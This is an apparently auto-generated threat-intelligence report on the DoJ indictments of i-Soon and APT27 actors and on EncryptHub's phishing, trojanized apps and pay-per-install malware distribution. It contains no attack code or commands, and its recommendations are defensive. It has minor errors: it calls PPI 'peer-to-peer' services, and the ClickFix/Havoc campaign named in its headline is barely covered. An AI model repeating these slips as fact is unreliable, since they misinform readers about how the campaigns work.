Full Report
DoJ indicts i-Soon and APT27 actors, EncryptHub buys pay-per-install services to compromise victims, and ClickFix abuses MS SharePoint to deploy Havoc.
Analysis Summary
# Incident Report: State-Sponsored Hacking and Financially Motivated Malware Campaigns
## Executive Summary
This report synthesizes information regarding two distinct threat landscapes: indictments against individuals linked to the Chinese state-sponsored groups APT27 and i-Soon for large-scale data theft targeting government entities, and the emergence of the financially motivated group EncryptHub, which utilizes advanced phishing and PPI services to distribute stealers and is developing new RAT capabilities. The US DOJ action against i-Soon demonstrates significant disruption to a state-backed hacking ecosystem, while EncryptHub represents a growing criminal trend leveraging social engineering and supply chain distribution for financial gain.
## Incident Details
- Discovery Date: Ongoing, with recent indictments announced this week (Timeline for specific breaches is historical/implied, starting circa 2011 for APT27/i-Soon).
- Incident Date: Ongoing campaigns; i-Soon activity noted since 2011. EncryptHub emerged in Summer of last year.
- Affected Organization: U.S. federal and state government agencies, foreign ministries across Asia (APT27/i-Soon). High-value commercial entities (EncryptHub).
- Sector: Government/Public Sector; General Enterprise (EncryptHub).
- Geography: Primarily US and Asia targets; operators based in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Ongoing since circa 2011 (for state actors). EncryptHub activity noted since Summer of last year.
- **Vector:**
* **i-Soon/APT27:** Exploiting vulnerabilities, likely direct targeting via state resources.
* **EncryptHub:** Advanced phishing, smishing, vishing, and trojanized software distribution.
- **Details:**
* APT27 actors exploited vulnerabilities and deployed PlugX malware.
* EncryptHub targeted entities using fake IT support sites for VPN credential theft, distributing malware via trojanized versions of Q Talk, WeChat, DingTalk, Google Meet, and Microsoft Visual Studio.
* EncryptHub is leveraging Pay-Per-Install (PPI) services like LabInstalls for bulk distribution.
### Lateral Movement
- **i-Soon/APT27:** Tactics not detailed in the summary, but typical for state actors targeting government networks.
- **EncryptHub:** Focus seems heavily on initial payload deployment (infostealers) potentially leading to remote access via the emergent EncryptRAT.
### Data Exfiltration/Impact
- **i-Soon/APT27:** Stolen data sold to at least 43 MSS and MPS bureaus across 31 Chinese provinces. Charging up to $75,000 per compromised email inbox.
- **EncryptHub:** Deployment of infostealers (Fickle, StealC, Rhadamanthys) leading to data theft. They are developing EncryptRAT for command and control and data access.
### Detection & Response
- **i-Soon/APT27:** Detection led to US Department of Justice (DoJ) indictments against 10 actors. Domain seized. State Department offered a $10M reward for i-Soon actors and $2M for APT27-linked actors. OFAC placed sanctions on APT27-linked actors.
- **EncryptHub:** Observed and tracked by security researchers (e.g., Outpost24). Response focuses on organizational defense layers.
## Attack Methodology
- **Initial Access:** Exploitation of vulnerabilities (APT27); Social engineering, Phishing (SMS/Voice), Trojanized applications (EncryptHub).
- **Persistence:** (Not explicitly detailed for i-Soon, but PlugX deployed). EncryptHub developing EncryptRAT for C2 management.
- **Privilege Escalation:** (Not explicitly detailed).
- **Defense Evasion:** (APT27 used PlugX/ShadowPad). EncryptHub leverages bulletproof hosting (Yalishand).
- **Credential Access:** EncryptHub targets VPN credentials via fake IT support sites.
- **Discovery:** (Implied for state actors).
- **Lateral Movement:** (Not detailed).
- **Collection:** Stolen intellectual property and sensitive data (i-Soon); Infostealer payloads (EncryptHub).
- **Exfiltration:** Data sold to state agencies (i-Soon). EncryptHub using EncryptRAT for remote command/access.
- **Impact:** Compromise of government systems (i-Soon/APT27); Financial gain via data sales (i-Soon); Infostealer deployment and establishing remote access (EncryptHub).
## Impact Assessment
- **Financial:** i-Soon charged significant fees ($75k per inbox). Financial motivation for EncryptHub. Sanctions and rewards totaling $12M USD offered by the US government related to indictments.
- **Data Breach:** Compromise of sensitive government and foreign ministry data (i-Soon). Theft of user credentials and sensitive files via infostealers (EncryptHub).
- **Operational:** Disruption to government continuity (implied). Operational risk for entities falling for EncryptHub scams.
- **Reputational:** Significant diplomatic and security ramifications from state-sponsored indictments.
## Indicators of Compromise
*Note: As this report summarizes indictments and general known TTPs, specific time-bound C2 IPs/domains are not provided.*
- **Network indicators:** C2 communications utilizing legitimate cloud services like Microsoft Graph API (ClickFix/Havok comparison scenario mentioned, though not directly linked to i-Soon/EncryptHub execution path).
- **File indicators:** PlugX malware (APT27); Fickle, StealC, Rhadamanthys infostealers (EncryptHub).
- **Behavioral indicators:** Use of PPI services for bulk malware distribution; deployment of C2 frameworks via Python scripts initiated by user actions.
## Response Actions
- **Containment:** (Not detailed for victims). For i-Soon, the US action involved domain seizure and sanctions.
- **Eradication:** (Unknown efficacy against state actors).
- **Recovery:** (Unknown scope).
## Lessons Learned
- State-sponsored hacking operations are deeply entrenched and structured as for-hire services (i-Soon) designed to monetize stolen data for specific government bureaus.
- Financially motivated groups like EncryptHub are rapidly adopting sophisticated techniques, including leveraging peer-to-peer distribution services (PPI) and developing native RATs (EncryptRAT).
- Social engineering remains highly effective, combining smishing/vishing with fake IT support lures to capture high-value credentials (VPNs).
## Recommendations
- Enhance supply chain vetting, particularly regarding third-party software installation brokers.
- Implement multi-layered security, including robust email filtering and endpoint detection capabilities capable of tracking suspicious PowerShell executions and clipboard activity.
- Continuous employee cybersecurity training specific to social engineering vectors (voice, SMS, and phishing sites mimicking internal IT).